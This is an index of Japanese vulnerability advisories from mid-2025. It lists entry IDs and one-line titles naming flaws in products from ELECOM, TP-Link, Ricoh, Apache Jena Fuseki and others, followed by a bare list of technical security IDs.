jvndb-2025-000058 WordPress plugin "Advanced Custom Fields" vulnerable to HTML injection 2025-08-08T15:29+09:00 2025-08-08T15:29+09:00
jvndb-2025-010972 Multiple SEIKO EPSON products use weak initial passwords 2025-08-08T14:50+09:00 2025-08-08T14:50+09:00
jvndb-2025-000057 Multiple vulnerabilities in Mubit Powered BLUE 870 2025-08-08T14:47+09:00 2025-08-08T14:47+09:00
jvndb-2025-000056 Multiple vulnerabilities in Sato label printers CL4/6NX Plus and CL4/6NX-J Plus series 2025-08-06T16:38+09:00 2025-08-06T16:38+09:00
jvndb-2025-010603 Out-of-bounds write vulnerability in FUJIFILM Business Innovation MFPs 2025-08-05T11:29+09:00 2025-08-05T11:29+09:00
jvndb-2025-010408 Multiple vulnerabilities in PowerCMS 2025-08-01T12:05+09:00 2025-08-01T12:05+09:00
jvndb-2025-000055 ZXHN-F660T and ZXHN-F660A use a common credential for all installations 2025-07-31T15:12+09:00 2025-07-31T15:12+09:00
jvndb-2025-000054 Apache Jena Fuseki vulnerable to path traversal 2025-07-30T14:17+09:00 2025-07-30T14:17+09:00
jvndb-2025-000053 "SwitchBot" App vulnerable to insertion of sensitive information into log file 2025-07-29T13:44+09:00 2025-07-29T13:44+09:00
jvndb-2025-010056 TP-Link VIGI NVR1104H-4P and VIGI NVR2016H-16MP vulnerable to OS command injection 2025-07-28T17:53+09:00 2025-07-28T17:53+09:00
jvndb-2025-000052 TP-Link Archer C1200 vulnerable to clickjacking 2025-07-24T14:16+09:00 2025-07-24T14:16+09:00
jvndb-2025-000051 Real-time Bus Tracking System vulnerable to improper validation of specified quantity in input 2025-07-23T13:54+09:00 2025-07-23T13:54+09:00
jvndb-2025-009576 Multiple vulnerabilities in ELECOM wireless LAN routers 2025-07-23T11:13+09:00 2025-07-23T11:13+09:00
jvndb-2025-000050 "region PAY" App for Android vulnerable to insertion of sensitive information into log file 2025-07-22T13:33+09:00 2025-07-22T13:33+09:00
jvndb-2025-009150 Security updates for Trend Micro products (June 2025) 2025-07-17T17:03+09:00 2025-07-17T17:03+09:00
jvndb-2025-000030 Reflected cross-site scripting vulnerability in multiple laser printers and MFPs which implement Ricoh Web Image Monitor 2025-05-12T18:00+09:00 2025-07-17T10:06+09:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
ts-2025-005 TS-2025-005
ts-2025-004 TS-2025-004
ts-2025-003 TS-2025-003
ts-2025-002 TS-2025-002
ts-2025-001 TS-2025-001
ts-2024-013 TS-2024-013
ts-2024-012 TS-2024-012
ts-2024-011 TS-2024-011
ts-2024-010 TS-2024-010
ts-2024-009 TS-2024-009
ts-2024-008 TS-2024-008
ts-2024-007 TS-2024-007
ts-2024-006 TS-2024-006
ts-2024-005 TS-2024-005
ts-2024-004 TS-2024-004
ts-2024-003 TS-2024-003
ts-2024-002 TS-2024-002
ts-2024-001 TS-2024-001
ts-2023-009 TS-2023-009
ts-2023-008 TS-2023-008
ts-2023-007 TS-2023-007
ts-2023-006 TS-2023-006
ts-2023-005 TS-2023-005
ts-2023-004 TS-2023-004
ts-2023-003 TS-2023-003
ts-2023-002 TS-2023-002
ts-2023-001 TS-2023-001
ts-2022-005 TS-2022-005
ts-2022-004 TS-2022-004
ts-2022-003 TS-2022-003